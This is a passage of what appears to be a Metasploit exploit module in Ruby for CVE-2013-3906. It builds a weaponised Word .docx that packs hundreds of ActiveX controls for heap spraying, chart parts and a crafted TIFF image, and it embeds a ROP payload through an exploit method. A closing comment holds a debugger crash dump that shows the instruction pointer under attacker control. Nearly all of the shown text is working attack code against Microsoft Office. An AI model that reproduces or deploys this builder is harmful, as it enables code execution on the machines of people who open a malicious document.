'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
'xmlns:r' => @schema
}
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.custom_root("ax")
xml.ocx(attrs)
end
builder.to_xml(:indent => 0)
end
#
# Creates an activeX[num].xml.rels
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, :target
# @return [String] XML document
#
def make_activex_xml_reals(rid, target_bin)
acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary"
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
end
end
builder.to_xml(:indent => 0)
end
#
# Creates a document.xml.reals file
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, and :target
# @return [String] XML document
#
def make_doc_xml_reals(relationships)
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
relationships.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
end
end
end
builder.to_xml(:indent => 0)
end
#
# Creates a _rels/.rels file
#
def init_rels(doc_xml, doc_props)
rels = []
rels << doc_xml
rels << doc_props
rels = rels.flatten
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
rels.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
end
end
end
{
:fname => "_rels/.rels",
:data => builder.to_xml(:indent => 0)
}
end
#
# Creates a run element for chart
# @param xml [Element]
# @param rid [String]
#
def create_chart_run_element(xml, rid)
drawingml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
xml.r do
xml.rPr do
xml.noProof
xml.lang({'w:val' => "en-US"})
end
xml.drawing do
xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
xml['wp'].extent({'cx'=>'1', 'cy'=>'1'})
xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
xml['wp'].docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"})
xml['wp'].cNvGraphicFramePr
xml['a'].graphic do
xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do
xml['c'].chart({'r:id'=>"rId#{rid.to_s}"})
end
end
end
end
end
end
#
# Creates a run element for ax
# @param xml [Element]
# @param rid [String]
#
def create_ax_run_element(xml, rid)
shape_attrs = {
'id' => "_x0000_i10#{rid.to_s}",
'type' => "#_x0000_t75",
'style' => "width:1pt;height:1pt",
'o:ole' => ""
}
control_attrs = {
'r:id' => "rId#{rid.to_s}",
'w:name' => "TabStrip#{rid.to_s}",
'w:shapeid' =>"_x0000_i10#{rid.to_s}"
}
xml.r do
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
xml['v'].shape(shape_attrs)
xml['w'].control(control_attrs)
end
end
end
#
# Creates a pic run element
# @param xml [Element]
# @param rid [String]
#
def create_pic_run_element(xml, rid)
drawinxml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
xml.r do
xml.rPr do
xml.noProof
xml.lang({'w:val'=>"en-US"})
end
xml.drawing do
xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
xml.extent({'cx'=>'1', 'cy'=>'1'})
xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"})
xml['wp'].cNvGraphicFramePr do
xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"})
end
xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do
xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].nvPicPr do
xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"})
xml['pic'].cNvPicPr
end
xml['pic'].blipFill do
xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print")
xml['a'].stretch do
xml['a'].fillRect
end
end
xml['pic'].spPr do
xml['a'].xfrm do
xml['a'].off({'x'=>"0", 'y'=>"0"})
xml['a'].ext({'cx'=>"1", 'cy'=>"1"})
end
xml['a'].prstGeom({'prst' => "rect"}) do
xml['a'].avLst
end
end
end
end
end
end
end
end
end
#
# Creates a document.xml file
# @param pre_defs [Array]
# @param activex [Array]
# @param tiff_file [Array]
# @return [String] XML document
#
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
# Get all the ActiveX RIDs
ax_rids = []
activex.select { |e| ax_rids << e[:id] }
# Get the TIFF RID
tiff_rid = tiff_file[:id]
# Documentation on how this is crafted:
# http://msdn.microsoft.com/en-us/library/office/gg278308.aspx
doc_attrs = {
'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006",
'xmlns:o' => "urn:schemas-microsoft-com:office:office",
'xmlns:r' => @schema,
'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math",
'xmlns:v' => "urn:schemas-microsoft-com:vml",
'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
'xmlns:w10' => "urn:schemas-microsoft-com:office:word",
'xmlns:w' => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml",
'xmlns:a' => "http://schemas.openxmlformats.org/drawingml/2006/main",
'xmlns:c' => "http://schemas.openxmlformats.org/drawingml/2006/chart"
}
p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" }
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.custom_root("w")
xml.document(doc_attrs) do
xml.body do
# Paragraph (ActiveX)
xml.p(p_attrs_1) do
# Paragraph properties
xml.pPr do
# Run properties
xml.rPr do
xml.lang({'w:val' => "en-US"})
end
end
ax_rids.each do |rid|
create_ax_run_element(xml, rid)
end
end
xml.p(p_attrs_2) do
xml.pPr do
xml.rPr do
xml['w'].lang({'w:val'=>"en-US"})
end
end
# Charts
chart_rids.each do |rid|
create_chart_run_element(xml, rid)
end
# TIFF
create_pic_run_element(xml, tiff_rid)
end
end
end
end
{
:id => (last_rid + 1).to_s,
:type => "#{@schema}/officeDocument",
:fname => "/word/document.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
:xml => builder.to_xml(:indent => 0)
}
end
#
# Creates a [Content.Types].xml file located in the parent directory
# @param overrides [Array] A collection of hashes with each containing
# the :PartName and :ContentType info
# @return [String] XML document
#
def make_contenttype_xml(overrides)
contenttypes = [
{
:Extension => "rels",
:ContentType => "application/vnd.openxmlformats-package.relationships+xml"
},
{
:Extension => "xml",
:ContentType => "application/xml"
},
{
:Extension => "jpeg",
:ContentType => "image/jpeg"
},
{
:Extension => "bin",
:ContentType => "application/vnd.ms-office.activeX"
},
{
:Extension => "xlsx",
:ContentType => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
}
]
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
# Default extensions
contenttypes.each do |contenttype|
xml.Default(contenttype)
end
# Additional overrides
overrides.each do |override|
override_attrs = {
:PartName => override[:PartName] || override[:fname],
:ContentType => override[:ContentType]
}
xml.Override(override_attrs)
end
end
end
builder.to_xml(:indent => 0)
end
#
# Pre-define some items that will be used in .rels
#
def init_doc_props(last_rid)
items = []
items << {
:id => (last_rid += 1),
:type => "#{@schema}/extended-properties",
:fname => "/docProps/app.xml",
:content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml"
}
items << {
:id => (last_rid += 1),
:type => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties",
:fname => "/docProps/core.xml",
:content_type => "application/vnd.openxmlformats-package.core-properties+xml"
}
return last_rid, items
end
#
# Pre-define some items that will be used in document.xml.rels
#
def init_doc_xml_rels_items(last_rid)
items = []
items << {
:id => (last_rid += 1),
:type => "#{@schema}/styles",
:fname => "/word/styles.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/settings",
:fname => "/word/settings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/webSettings",
:fname => "/word/webSettings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/fontTable",
:fname => "/word/fontTable.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/theme",
:fname => "/word/theme/theme1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.theme+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart2.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart3.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart4.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart5.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart6.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
return last_rid, items
end
#
# Manually create everything manually in the ActiveX directory
#
def init_activex_files(last_rid)
activex = []
0x250.times do |i|
id = (last_rid += 1)
bin = {
:fname => "/word/activeX/activeX#{id.to_s}.bin",
:bin => make_activex_bin
}
xml = {
:fname => "/word/activeX/activeX#{id.to_s}.xml",
:xml => make_activex_xml(id)
}
rels = {
:fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels",
:rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin")
}
ct = "application/vnd.ms-office.activeX+xml"
type = "#{@schema}/control"
activex << {
:id => id,
:bin => bin,
:xml => xml,
:rels => rels,
:content_type => ct,
:type => type
}
end
return last_rid, activex
end
#
# Create a [Content_Types.xml], each node contains these attributes:
# :PartName The path to an ActiveX XML file
# :ContentType The contenttype of the XML file
#
def init_contenttype_xml_file(*items)
overrides = []
items.each do |item|
item.each do |obj|
overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]}
end
end
{:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
end
#
# Creates the tiff file
#
def init_tiff_file(last_rid)
id = last_rid + 1
tiff_data = {
:id => id,
:fname => "/word/media/image1.jpeg",
:data => make_tiff,
:type => "#{@schema}/image"
}
return id, tiff_data
end
#
# Create the document.xml.rels file
#
def init_doc_xml_reals_file(pre_defs, activex, tiff)
reals = []
pre_defs.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')}
end
activex.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')}
end
reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')}
{:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
end
#
# Loads a fiile
#
def read_file(fname)
buf = ''
::File.open(fname, "rb") do |f|
buf << f.read
end
buf
end
#
# Packages everything to docx
#
def make_docx(path)
print_status("Initializing files...")
last_rid = 0
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
last_rid, tiff_file = init_tiff_file(last_rid)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new
Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')
if File.directory?(file)
print_status("Packing directory: #{p}")
zip.add_file(p)
else
# Avoid packing image1.jpeg because we'll load it separately
if file !~ /media\/image1\.jpeg/
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
end
end
end
print_status("Packing ActiveX controls...")
activex.each do |ax|
ax_bin = ax[:bin]
ax_xml = ax[:xml]
ax_rels = ax[:rels]
vprint_status("Packing file: #{ax_bin[:fname]}")
zip.add_file(ax_bin[:fname], ax_bin[:bin])
vprint_status("Packing file: #{ax_xml[:fname]}")
zip.add_file(ax_xml[:fname], ax_xml[:xml])
vprint_status("Packing file: #{ax_rels[:fname]}")
zip.add_file(ax_rels[:fname], ax_rels[:rels])
end
print_status("Packing file: #{ct_xml_file[:fname]}")
zip.add_file(ct_xml_file[:fname], ct_xml_file[:data])
print_status("Packing file: #{tiff_file[:fname]}")
zip.add_file(tiff_file[:fname], tiff_file[:data])
print_status("Packing file: #{doc_xml[:fname]}")
zip.add_file(doc_xml[:fname], doc_xml[:xml])
print_status("Packing file: #{rels_xml[:fname]}")
zip.add_file(rels_xml[:fname], rels_xml[:data])
print_status("Packing file: #{doc_xml_reals_file[:fname]}")
zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
zip.pack
end
def exploit
@rop_payload = get_rop_payload
@schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
docx = make_docx(path)
file_create(docx)
end
end
=begin
0:000> r
eax=414242f4 ebx=00000000 ecx=22a962a0 edx=44191398 esi=22c4d338 edi=1cfe5dc0
eip=44023a2a esp=0011fd8c ebp=0011fd98 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
OGL!GdipCreatePath+0x58:
44023a2a ff5050 call dword ptr [eax+50h] ds:0023:41424344=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0011fd98 437a9681 OGL!GdipCreatePath+0x58
0011fdc8 437b11b0 gfx+0x9681
0011fdf0 422b56e5 gfx+0x111b0
0011fe18 422a99f7 oart!Ordinal3584+0x86
0011fed8 422a9921 oart!Ordinal7649+0x2b2
0011fef0 422a8676 oart!Ordinal7649+0x1dc
001200bc 422a85a8 oart!Ordinal4145+0x199
001200fc 424898c6 oart!Ordinal4145+0xcb
001201bc 42489b56 oart!Ordinal3146+0xb15
001202cc 422a37df oart!Ordinal3146+0xda5
00120330 422a2a73 oart!Ordinal2862+0x14e
00120360 317821a9 oart!Ordinal2458+0x5e
001203bc 31782110 wwlib!GetAllocCounters+0x9bd51
001204a4 3177d1f2 wwlib!GetAllocCounters+0x9bcb8
001207ec 3177caef wwlib!GetAllocCounters+0x96d9a
0012088c 3177c7a0 wwlib!GetAllocCounters+0x96697
001209b0 3175ab83 wwlib!GetAllocCounters+0x96348
001209d4 317569e0 wwlib!GetAllocCounters+0x7472b
00120ad4 317540f5 wwlib!GetAllocCounters+0x70588
00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d
To-do:
Turn the docx packaging into a mixin. Good luck with that.
=end